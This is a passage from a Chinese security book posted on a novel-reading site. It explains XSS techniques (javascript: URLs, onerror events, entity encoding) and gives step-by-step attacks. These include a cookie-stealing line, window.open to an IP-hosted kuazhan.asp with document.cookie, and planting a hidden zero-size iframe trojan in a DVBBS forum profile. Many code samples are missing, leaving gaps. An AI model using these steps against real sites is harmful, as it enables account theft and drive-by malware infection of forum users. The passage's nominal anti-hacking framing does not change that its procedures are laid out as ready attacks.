友情提示:如果本网页打开太慢或显示不完整,请尝试鼠标右键“刷新”本网页!阅读过程发现任何错误请告诉我们,谢谢!! 报告错误
八八书城 返回本书目录 我的书架 我的书签 TXT全本下载 进入书吧 加入书签

反黑风暴-第章

按键盘上方向键 ← 或 → 可快速上下翻页,按键盘上的 Enter 键可回到本书目录页,按键盘上方向键 ↑ 可回到本页顶部!
————未阅读完?加入书签已便下次继续阅读!



运行后即可看到弹出的XSS提示。≮我们备用网址:≯

8。1。2属性中的“javascript:”

由于闭合表单赋值所在的标记,形成完整无错的脚本标记,即可触发XSS。如果没有脚本标记应怎样触发XSS呢?下面将介绍针对没有脚本标记的情况触发XSS的方法。

对于一些没有脚本标记的情况,攻击者需要使用其他标记进行闭合表单赋值所在的标记。比如,要在网页中显示一张图片,一般情况下会使用“”来定义,其具体的语句如下:



其中,“img”并不是真正地将图片加入到html文档里,而是通过“src”属性赋值。浏览器的任务是解释这个“img”,过程是访问“src”属性值中的URL地址,并为用户输出图片。但浏览器并不会主动检测这个“src”属性的相关值,这样,那些攻击者就有机可程了。

Javascript有一个URL伪协议,可以使用“javascript:”加上任意的javascript代码,当浏览器装载这样的URL时,便会执行其中的代码。这样,攻击者在某表单可以提交内容,并且没有过滤字符的情况下,就可以通过提交参数实现另一个跨站脚本攻击:



按照上一节中介绍的方法在记事本中输入上述代码并运行,页面中将会弹出一个提示框,提示框里面的内容就是上面代码中(‘测试’)语句的内容,即测试。

8。1。3事件类XSS代码

“img”有一个可以被XSS利用的onerror()事件,当“img”含有一个onerror()事件,而正好图片没有正常输出时,即可触发。且触发后可加入任意脚本代码,其中的代码也会被执行。代码的内容:

8。1。4编码后的XSS代码

从上面的几节内容中可以看出,攻击者要想进行XSS攻击,其实非常容易,这使许多网站都受到这种攻击。为了让攻击者无法构造XSS,一些程序员开始在脚本中过滤一些javascript的关键字符,如“&”和“”。但由于浏览器大多默认采用unicode编码,因此,这样的过滤并不能阻挡攻击者发起跨站脚本攻击。而在此基础上,HTML编码可以用“&#”+ASCII码的方式来提交,浏览器同样是认识且会执行的。

XSS转码只需要针对属性所赋予的值进行即可,如将下面的XSS代码:



经过“&#”+ASCII码的方式处理后,可变成如下的代码:



这是利用十进制转码后的代码,执行该代码后。

第二章 一个典型的跨站攻击实例

黑客进行XSS攻击的前提是需要先向Web页面中写入恶意HTML代码,写入代码的方法很多,比如最常见的是在论坛中发贴时,在帖子中写入可执行的代码;或者在网站的用户资料修改处,也可以通过更改签名、联系方式等,在用户信息页面中嵌入脚本代码。但无论采用哪种方式写入执行代码,都要求网页程序没有对用户输入的数据进行严格的过滤,否则就无法写入执行。

因此,造成跨站攻击的主要原因就是由于网站服务器端的程序,对客户的输入不进行有效验证,这样攻击者才有机会输入一些恶意的Script程序代码。

由于动态网站依赖于用户的输入,所以黑客可以通过把恶意脚本隐藏在合法请求中,将恶意脚本输入网页。一旦实现XSS攻击,黑客可以任意更改用户的设置、盗取账号、访问受限制的网站等操作。

XSS攻击分成两类,一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:DVBBS的showerror。asp存在的跨站漏洞。另一类则是来自外部的攻击,主要指的是自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如果发现某个网站存在跨站漏洞,如Q…Zone个人空间名称跨站漏洞,黑客就可以通过编制一些窃取网页浏览用户的Cookie内容代码,来获取Cookie中的各种论坛和网站的账号和密码。

具体的操作步骤如下:

步骤01在网上申请一个网站空间,将准备好的kuazhan。asp文件上传到申请的空间中。kuazhan。asp文件的作用是收集Cookie内容,其具体内容如下。



步骤02下载并运行“Q…ZONE个人名称空间跨站漏洞利用工具”。

步骤03在文本框中输入相应的跨站代码。



Window。open(‘//192。168。0。45/kuazhan。asp?msg=’+document。cookie)



步骤04单击【提交】按钮,即可将该代码提交到黑客的Q…Zone页面上。只要其他QQ用户访问其Q…Zone时就会在当前网页中打开一个新窗口,连接到指定的收集Cookie的页面,并将自己的Cookie内容发送到网站空间中的“shouji。”文件中。

步骤05打开“shouji。”文件,即可看到用户的Cookie信息,而这些Cookie信息中可能就包含有各个用户的密码和账号。

这就是一个简单的跨站攻击的例子,攻击者之所以能够成功提交Script语句,而网站程序也把它作为正常的用户名执行程序,就是因为网页程序对用户输入的用户名过滤不严。

如果一个点击率和访问量很大的网站首页中被嵌入了网页木马,那将造成极其严重的后果,访问网站的每一个用户都有可能遭到木马的攻击。前面我们提到,DVBBS论坛的

showerror。asp页面存在一个严重的跨站漏洞,用户无须管理员权限,就可以在论坛页面中嵌入网页木马,攻击其他论坛用户。下面就以这个论坛为例,为大家介绍一个典型的黑客跨站入侵攻击实例。

1.在动网中嵌入一个网页

要实现跨站入侵攻击,需在DVBBS论坛网站中嵌入木马网页。具体的操作步骤如下:

步骤01在IE浏览器的地址栏中输入网址//bbs。dvbbs。/,即可打开动网官方论坛。

步骤02要登录该论坛,需要先在该论坛中注册一个用户。单击【注册】按钮,注册一个新用户即可;若已是注册用户,则单击【登录】按钮。

步骤03在用户名右侧选择【控制面板】→【联系资料修改】菜单项,即可打开个人资料修改页面。

步骤04在“论坛密码”文本框中输入论坛密码,在“主页地址”栏中输入代码“”。

【提示】

“主页地址”栏中输入的代码表示建立一个长度和宽度都为0的网页框架,在网页框架中会打开填写的网页木马地址。可以根据实际情况修改网页框架的长度和宽度及网页木马地址。

使用这种方式挂的网页木马,由于网页框架是隐藏的,因此别人根本无法发现。为了避免输入的网页木马地址对论坛造成危害,这里将输入一个普通的网址来代替网页木马地址,来演示一下挂马的效果。在“主页地址”栏中输入如下代码:



并输入Email地址,在“MSN号码”文本框中输入如下代码:

varactioninfo3='单帖屏蔽'。

步骤5:在设置完成后,单击【更新】按钮,即可提交修改资料内容。在提交成功后,则系统会弹出提示信息。

步骤06返回动网论坛中,在其中新发一个帖子,帖子的内容可以随意填写。发表成功后再查看新发的帖子,即可看到在新发的帖子页面中已经嵌入了一个网页框架,在框架中显示了“新起点工作室”的页面。

若是用隐藏的方法显示一个网页木马,则其他网页在查看该帖子时一定会中招被植入木马。如果将该网页框架长和宽都设置为0,则网页框架是隐藏的,任何浏览者都将会在无声无息中遭受到网页木马的攻击。

2.查找动网程序出现严重漏洞的原因

从上面的实例中可以看出,其实在动网论坛上挂上一个网页木马是一件非常容易的事,不需要很多
返回目录 上一页 下一页 回到顶部 0 3
未阅读完?加入书签已便下次继续阅读!
温馨提示: 温看小说的同时发表评论,说出自己的看法和其它小伙伴们分享也不错哦!发表书评还可以获得积分和经验奖励,认真写原创书评 被采纳为精评可以获得大量金币、积分和经验奖励哦!